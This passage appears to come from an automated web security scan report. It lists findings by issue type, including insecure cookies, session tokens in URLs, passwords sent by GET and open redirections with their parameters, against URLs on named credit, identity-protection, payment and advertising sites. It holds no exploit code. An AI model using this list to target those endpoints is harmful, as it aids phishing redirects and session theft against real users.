10.119. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 2]

10.120. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]

10.121. http://seal.controlcase.com/favicon.ico [REST URL parameter 1]

10.122. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 1]

10.123. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 2]

10.124. http://seal.controlcase.com/include/image/back_en.gif [REST URL parameter 3]

10.125. http://seal.controlcase.com/index.php [REST URL parameter 1]

10.126. http://www.dictof.com/favicon.ico [REST URL parameter 1]

10.127. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 1]

10.128. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 2]

10.129. http://www.infusionblog.com/wp-content/themes/hybrid/library/js/drop-downs.js [REST URL parameter 3]

11. SSL cookie without secure flag set

11.1. https://login.silverlight.net/login/createuser.aspx

11.2. https://login.silverlight.net/login/signin.aspx

11.3. https://netserv.fpoint.com/redir/redirect.asp

11.4. https://online.americanexpress.com/myca/ocareg/us/action

11.5. https://protect724.arcsight.com/

11.6. https://secure.identityguard.com/EnrollmentStep1

11.7. https://secure.identityguard.com/EnrollmentStep1

11.8. https://secure.identityguard.com/EnrollmentStep1

11.9. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1

11.10. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs

11.11. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

11.12. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo

11.13. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails

11.14. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

11.15. https://secure.lifelock.com/portal/login

11.16. https://security.live.com/LoginStage.aspx

11.17. https://www.experiandirect.com/triplealert/default.aspx

11.18. https://www.truecredit.com/

11.19. https://www.truecredit.com/products/optimizedOrder.jsp

11.20. https://www.truecredit.com/products/optimizedOrderProcess

11.21. https://www.truecredit.com/products/order2.jsp

11.22. https://www.truecredit.com/user/returnUser.jsp

11.23. https://www.truecredit.com/user/returnUserProcess

11.24. https://crm.infusionsoft.com/go/infs/footer_psr/web

11.25. https://inter.viewcentral.com/events/cust/search_results.aspx

11.26. https://inter.viewcentral.com/events/images/border/trans_spacer.gif

11.27. https://inter.viewcentral.com/events/images/loading_0.gif

11.28. https://inter.viewcentral.com/events/images/loading_1.gif

11.29. https://inter.viewcentral.com/events/images/loading_2.gif

11.30. https://inter.viewcentral.com/events/images/loading_3.gif

11.31. https://inter.viewcentral.com/events/images/poweredby1.gif

11.32. https://inter.viewcentral.com/events/incl/BusyBox.js

11.33. https://inter.viewcentral.com/events/uploads/arcsight/ae.png

11.34. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_dn.gif

11.35. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_rt.gif

11.36. https://inter.viewcentral.com/events/uploads/arcsight/asu_css.css

11.37. https://inter.viewcentral.com/events/uploads/arcsight/asu_masthead_v02.png

11.38. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstfooter.jpg

11.39. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg

11.40. https://inter.viewcentral.com/events/uploads/arcsight/bg_container.jpg

11.41. https://inter.viewcentral.com/events/uploads/arcsight/bg_page.gif

11.42. https://inter.viewcentral.com/events/uploads/arcsight/bg_sectionhdr.png

11.43. https://inter.viewcentral.com/events/uploads/arcsight/catalog_employee.png

11.44. https://inter.viewcentral.com/events/uploads/arcsight/catalog_partner.png

11.45. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg

11.46. https://inter.viewcentral.com/events/uploads/arcsight/cellBg.gif

11.47. https://inter.viewcentral.com/events/uploads/arcsight/cellBg2.gif

11.48. https://inter.viewcentral.com/events/uploads/arcsight/esm.png

11.49. https://inter.viewcentral.com/events/uploads/arcsight/greybar.png

11.50. https://inter.viewcentral.com/events/uploads/arcsight/icon_new.png

11.51. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg

11.52. https://inter.viewcentral.com/events/uploads/arcsight/logger.png

11.53. https://inter.viewcentral.com/events/uploads/arcsight/red.png

11.54. https://inter.viewcentral.com/events/uploads/arcsight/topbgfill.gif

11.55. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg

11.56. https://inter.viewcentral.com/events/uploads/arcsight/wbt.png

11.57. https://inter.viewcentral.com/favicon.ico

11.58. https://inter.viewcentral.com/reg/arcsight/home

11.59. https://login.live.com/login.srf

11.60. https://online.americanexpress.com/myca/acctsumm/us/action

11.61. https://online.americanexpress.com/myca/logon/us/action

11.62. https://online.americanexpress.com/myca/shared/summary/UMS/images/us/generic.jpg

11.63. https://portal.actividentity.com/

11.64. https://secure.identityguard.com/EnrollmentStep1

11.65. https://secure.identityguard.com/EnrollmentStep1

11.66. https://secure.identityguard.com/Logoff

11.67. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

11.68. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

11.69. https://secure.krypt.com/active/cart/cart-image.html

11.70. https://secure.krypt.com/cart/

11.71. https://secure.krypt.com/checkout/

11.72. https://secure.krypt.com/order/customize.html

11.73. https://secure.lifelock.com/

11.74. https://secure.lifelock.com/enrollment

11.75. https://secure.lifelock.com/enrollment/

11.76. https://secure.lifelock.com/portal/account-reset

11.77. https://secure.lifelock.com/resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif

11.78. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

11.79. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

11.80. https://secure.lifelock.com/scripts/global.js

11.81. https://secure.lifelock.com/siteopt.js

11.82. https://secure.lifelock.com/styles/login.css

11.83. https://secure.lifelock.com/styles/theme-lifelock.css

11.84. https://secure.lifelock.com/styles/webstore.css

11.85. https://www.creditchecktotal.com/ForgotLogin.aspx

11.86. https://www.creditchecktotal.com/Login.aspx

11.87. https://www.creditchecktotal.com/Message.aspx

11.88. https://www.creditchecktotal.com/Order1.aspx

11.89. https://www.creditchecktotal.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

11.90. https://www.creditchecktotal.com/javascripts/s_code.axd

11.91. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx

11.92. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

11.93. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

11.94. https://www.creditreport.com/dni/Order1.aspx

11.95. https://www.creditreport.com/dni/javascripts/s_code.axd

11.96. https://www.creditreport.com/dni/time-out.aspx

11.97. https://www.experiandirect.com/TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

11.98. https://www.experiandirect.com/triplealert/Message.aspx

11.99. https://www.experiandirect.com/triplealert/Order1.aspx

11.100. https://www.experiandirect.com/triplealert/javascripts/s_code.axd

11.101. https://www.freecreditscore.com/dni/javascripts/s_code.axd

11.102. https://www.freecreditscore.com/dni/sign-in.aspx

11.103. https://www.myfico.com/Store/Register.aspx

11.104. https://www.myfico.com/Store/Register.aspx

11.105. https://www.myfico.com/SystemAccess/ForgotMemberInfo.aspx

11.106. https://www.paypal.com/cgi-bin/webscr

11.107. https://www.senderscore.org/landing/ppcregistration/index.php

11.108. https://www.trustedid.com/cmalp1.php

11.109. https://www.trustedid.com/idfide01/

11.110. https://www.trustedid.com/suzeidprotector/

12. Session token in URL

12.1. http://bh.contextweb.com/bh/set.aspx

12.2. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard

12.3. http://fls.doubleclick.net/activityi

12.4. http://khm0.googleapis.com/kh

12.5. http://khm1.googleapis.com/kh

12.6. http://l.sharethis.com/pview

12.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

12.8. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

12.9. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

12.10. http://mt0.googleapis.com/mapslt/ft

12.11. http://mt1.googleapis.com/mapslt/ft

12.12. http://polls.linkedin.com/vote/131808/nzkbm

12.13. https://secure.lifelock.com/portal/login

12.14. http://www.apture.com/js/apture.js

12.15. https://www.econsumer.equifax.com/otc/landing.ehtml

12.16. http://www.infusionblog.com/

13. SSL certificate

13.1. https://login.silverlight.net/

13.2. https://secure.identityguard.com/

13.3. https://secure.krypt.com/

13.4. https://vault.krypt.com/

13.5. https://www.facebook.com/

13.6. https://www.senderscore.org/

13.7. https://cam.infusionsoft.com/

13.8. https://crm.infusionsoft.com/

13.9. https://inter.viewcentral.com/

13.10. https://login.live.com/

13.11. https://membership.identitymonitor.citi.com/

13.12. https://online.americanexpress.com/

13.13. https://protect724.arcsight.com/

13.14. https://psr.infusionsoft.com/

13.15. https://secure.lifelock.com/

13.16. https://www.credit.com/

13.17. https://www.creditreport.com/

13.18. https://www.econsumer.equifax.com/

13.19. https://www.equifax.com/

13.20. https://www.experiandirect.com/

13.21. https://www.freecreditscore.com/

13.22. https://www.hotelclub.com/

13.23. https://www.identityguard.com/

13.24. https://www.my3bureaucreditreport.com/

13.25. https://www.myfico.com/

13.26. https://www.paypal.com/

13.27. https://www.pcisecuritystandards.org/

13.28. https://www.privacyguard.com/

13.29. https://www.securepaynet.net/

13.30. https://www.truecredit.com/

13.31. https://www.trustedid.com/

14. Password field submitted using GET method

14.1. https://online.americanexpress.com/myca/ocareg/us/action

14.2. http://www.pcworld.com/pcworldconnect/comment_registration

15. ASP.NET ViewState without MAC enabled

16. Open redirection

16.1. http://0.gravatar.com/avatar/c15ade3c9f2e1a2ac0337526017d8aa2 [d parameter]

16.2. http://ad.doubleclick.net/clk [sv3 parameter]

16.3. http://ad.trafficmp.com/a/bpix [r parameter]

16.4. http://b.scorecardresearch.com/r [d.c parameter]

16.5. http://bh.contextweb.com/bh/rtset [rurl parameter]

16.6. https://crm.infusionsoft.com/aff.html [to parameter]

16.7. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022 [vvp parameter]

16.8. http://gravatar.com/avatar.php [d parameter]

16.9. http://sftrack.searchforce.net/SFConversionTracking/redir [jr parameter]

16.10. http://www.googleadservices.com/pagead/aclk [adurl parameter]

17. Cookie scoped to parent domain

17.1. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

17.2. http://www.fightidentitytheft.com/credit-monitoring.html

17.3. http://www.infusionsoft.com/

17.4. http://a.tribalfusion.com/i.cid

17.5. http://ace-tag.advertising.com/action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2

17.6. http://action.mathtag.com/mm//TRAN//red

17.7. http://ad.amgdgt.com/ads/

17.8. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

17.9. http://ad.doubleclick.net/activity

17.10. http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9

17.11. http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28

17.12. http://ad.doubleclick.net/adj/inet.hostcat/_default

17.13. http://ad.doubleclick.net/clk

17.14. http://ad.trafficmp.com/a/bpix

17.15. http://ad.turn.com/server/ads.js

17.16. http://ads.revsci.net/adserver/ako

17.17. http://ads.revsci.net/adserver/ako

17.18. http://ads.revsci.net/adserver/ako

17.19. http://ads.revsci.net/adserver/ako

17.20. http://ads.revsci.net/adserver/ako

17.21. http://ads.revsci.net/adserver/ako

17.22. http://ads.revsci.net/adserver/ako

17.23. http://ads.revsci.net/adserver/ako

17.24. http://ads.revsci.net/adserver/ako

17.25. http://ads.revsci.net/adserver/ako

17.26. http://ads.revsci.net/adserver/ako

17.27. http://ads.revsci.net/adserver/ako

17.28. http://ads.revsci.net/adserver/ako

17.29. http://ads.revsci.net/adserver/ako

17.30. http://ads.revsci.net/adserver/ako

17.31. http://adserver.veruta.com/track.fcgi

17.32. http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1

17.33. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

17.34. http://ar.voicefive.com/b/wc_beacon.pli

17.35. http://ar.voicefive.com/bmx3/broker.pli

17.36. http://ar.voicefive.com/bmx3/broker.pli

17.37. http://ar.voicefive.com/bmx3/broker.pli

17.38. http://ar.voicefive.com/bmx3/broker.pli

17.39. http://ar.voicefive.com/bmx3/broker.pli

17.40. http://asset.userfly.com/users/49267/userfly.js

17.41. http://at.amgdgt.com/ads/

17.42. http://b.scorecardresearch.com/b

17.43. http://b.scorecardresearch.com/p

17.44. http://b.scorecardresearch.com/r

17.45. http://b.voicefive.com/b

17.46. http://bh.contextweb.com/bh/rtset

17.47. http://bh.contextweb.com/bh/set.aspx

17.48. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

17.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.51. http://bstats.adbrite.com/click/bstats.gif

17.52. http://bstats.adbrite.com/click/bstats.gif

17.53. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html

17.54. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html

17.55. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html

17.56. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html

17.57. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html

17.58. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html

17.59. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html

17.60. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html

17.61. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html

17.62. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html

17.63. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html

17.64. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html

17.65. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html

17.66. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html

17.67. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html

17.68. http://cdn.w55c.net/i/0RphY9og2j_721933665.html

17.69. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html

17.70. http://cf.addthis.com/red/p.json

17.71. http://clk.atdmt.com/go/253732016/direct

17.72. http://cmi.netseer.com/match

17.73. http://cmi.netseer.com/redirect

17.74. http://cspix.media6degrees.com/orbserv/hbpix

17.75. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk

17.76. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU

17.77. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ

17.78. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM

17.79. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js

17.80. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js

17.81. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

17.82. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

17.83. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

17.84. http://data.adsrvr.org/map/cookie/google

17.85. http://ds.addthis.com/red/psi/sites/krypt.com/p.json

17.86. http://ehg-swisscom.hitbox.com/HG

17.87. http://ehg-swisscom.hitbox.com/HGct

17.88. http://equfx.netmng.com/

17.89. http://fls.doubleclick.net/activityi

17.90. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1027338450/

17.91. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1040833525/

17.92. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072108379/

17.93. http://hellometro.us.intellitxt.com/intellitxt/front.asp

17.94. http://ib.adnxs.com/ab

17.95. http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk

17.96. http://ib.adnxs.com/if

17.97. http://ib.adnxs.com/px

17.98. http://ib.adnxs.com/seg

17.99. http://id.google.com/verify/EAAAALo1qFZ_GU7ze97DXbvzobQ.gif

17.100. http://id.google.com/verify/EAAAANQhD1wDZOumO9f0pkRAxSM.gif

17.101. http://idcs.interclick.com/Segment.aspx

17.102. http://image.providesupport.com/js/spiffyman/safe-standard.js

17.103. http://image2.pubmatic.com/AdServer/Pug

17.104. http://img.securepaynet.net/image.aspx

17.105. http://img167.imageshack.us/img167/6361/06ls4.jpg

17.106. http://img262.imageshack.us/img262/3146/17ls3.jpg

17.107. http://imp.constantcontact.com/imp/cmp.jsp

17.108. http://insight.adsrvr.org/track/conv

17.109. http://leadback.advertising.com/adcedge/lb

17.110. http://leadback.netseer.com/dsatserving2/servlet/log

17.111. http://m.adnxs.com/msftcookiehandler

17.112. http://maps.google.co.in/maps

17.113. http://maps.google.com/maps

17.114. http://maps.google.com/maps/vp

17.115. http://media.fastclick.net/w/tre

17.116. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417

17.117. http://msdn.microsoft.com/

17.118. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702

17.119. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352

17.120. http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735

17.121. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511

17.122. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

17.123. https://online.americanexpress.com/myca/ocareg/us/action

17.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

17.125. http://pixel.33across.com/ps/

17.126. http://pixel.fetchback.com/serve/fb/pdc

17.127. http://pixel.mathtag.com/event/img

17.128. http://pixel.quantserve.com/pixel

17.129. http://pixel.quantserve.com/pixel/p-01ujhAj7lIRP-.gif

17.130. http://pixel.rubiconproject.com/tap.php

17.131. http://r.turn.com/r/beacon

17.132. http://r.vertster.com/track/

17.133. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

17.134. http://sales.liveperson.net/hc/31254474/

17.135. http://sales.liveperson.net/hc/71003277/

17.136. https://secure.krypt.com/active/cart/cart-image.html

17.137. https://secure.krypt.com/cart/

17.138. https://secure.krypt.com/checkout/

17.139. https://secure.krypt.com/order/customize.html

17.140. https://security.live.com/LoginStage.aspx

17.141. http://segment-pixel.invitemedia.com/pixel

17.142. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

17.143. http://srv.amadesa.com/Interaction2/app

17.144. http://stats.adbrite.com/stats/stats.gif

17.145. http://stats.adbrite.com/stats/stats.gif

17.146. http://switch.atdmt.com/action/msnus_experian_homepage_091807

17.147. http://track3.mybloglog.com/js/jsserv.php

17.148. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

17.149. http://www.apture.com/js/apture.js

17.150. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

17.151. http://www.iis.net/

17.152. http://www.infusionsoft.com/

17.153. http://www.infusionsoft.com/about

17.154. http://www.infusionsoft.com/clients

17.155. http://www.infusionsoft.com/demo

17.156. http://www.infusionsoft.com/pricing

17.157. http://www.krypt.com/active/captcha.html

17.158. http://www.krypt.com/active/cart/cart-image.html

17.159. http://www.krypt.com/contact/

17.160. http://www.krypt.com/solutions/

17.161. http://www.krypt.com/why-us/

17.162. http://www.krypt.com/why-us/datacenters/lax/

17.163. http://www.krypt.com/why-us/network/

17.164. http://www.lijit.com/beacon

17.165. http://www.lijit.com/res/images/wijitTrack.gif

17.166. https://www.paypal.com/cgi-bin/webscr

17.167. http://www.securepaynet.net/default.aspx

17.168. http://www.securepaynet.net/external/json/SalesBanner.aspx

17.169. https://www.trustedid.com/cmalp1.php

17.170. https://www.trustedid.com/idfide01/

17.171. https://www.trustedid.com/registration.php

17.172. https://www.trustedid.com/suzeidprotector/

18. Cookie without HttpOnly flag set

18.1. http://ads.adxpose.com/ads/ads.js

18.2. http://affiliate.idgtracker.com/rd/r.php

18.3. http://audience.sysomos.com/track/p

18.4. http://audience.sysomos.com/track/t

18.5. https://cam.infusionsoft.com/cart/process

18.6. https://cam.infusionsoft.com/cart/purchase

18.7. http://chat.livechatinc.net/licence/1028624/script.cgi

18.8. http://content.truecredit.com/sites/entry/assets/javascript/campaign.js

18.9. http://controlcase.com/antispam.php

18.10. http://controlcase.com/contact.php

18.11. http://converseon.com/

18.12. http://creditchecktotal.com/

18.13. http://dg.specificclick.net/

18.14. http://echomail.com/

18.15. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp

18.16. http://engine03.echomail.com/icomee-regs/trial/QuickTrial.jsp

18.17. http://event.adxpose.com/event.flow

18.18. http://hillandknowlton.com/

18.19. http://img.securepaynet.net/image.aspx

18.20. http://inter.viewcentral.com/events/redir/redir.aspx

18.21. http://leadback.netseer.com/dsatserving2/servlet/log

18.22. https://membership.identitymonitor.citi.com/pages2/english/neworder.asp

18.23. https://netserv.fpoint.com/redir/redirect.asp

18.24. https://online.americanexpress.com/myca/ocareg/us/action

18.25. https://protect724.arcsight.com/

18.26. http://sales.liveperson.net/visitor/addons/deploy.asp

18.27. http://seal.controlcase.com/index.php

18.28. https://secure.identityguard.com/EnrollmentStep1

18.29. https://secure.identityguard.com/EnrollmentStep1

18.30. https://secure.identityguard.com/EnrollmentStep1

18.31. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1

18.32. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs

18.33. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

18.34. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo

18.35. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails

18.36. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

18.37. https://secure.lifelock.com/portal/login

18.38. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

18.39. http://swisscomonlineshop.sso.bluewin.ch/Onlineshop/Scripts/jquery.tagsphere.js

18.40. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/DropDownList.css

18.41. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Images.css

18.42. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlackDown.gif

18.43. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlue.gif

18.44. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowBlueDown.gif

18.45. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ArrowRound.gif

18.46. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonBackground.gif

18.47. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonLeft.gif

18.48. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ButtonRightArrow.gif

18.49. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftBottom.gif

18.50. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftMiddle.gif

18.51. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarLeftTop.gif

18.52. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightBottom.gif

18.53. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightMiddle.gif

18.54. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/SeparatorbarRightTop.gif

18.55. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabLeft.gif

18.56. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabMiddle.gif

18.57. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/TabRight.gif

18.58. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Layout/ajax-loader.gif

18.59. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/App_Themes/Default/Watermark.css

18.60. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/IECssHacks.css

18.61. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Input.css

18.62. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Layout.css

18.63. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Print.css

18.64. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/StyleSheet.css

18.65. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/SubscriptionIE6.css

18.66. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/smoothness/jquery-ui-1.8.4.custom.css

18.67. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/Open3D.js

18.68. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/hbx.js

18.69. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/swfobject.js

18.70. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/utils.js

18.71. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx

18.72. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/PagesShared/Include/s_code.js

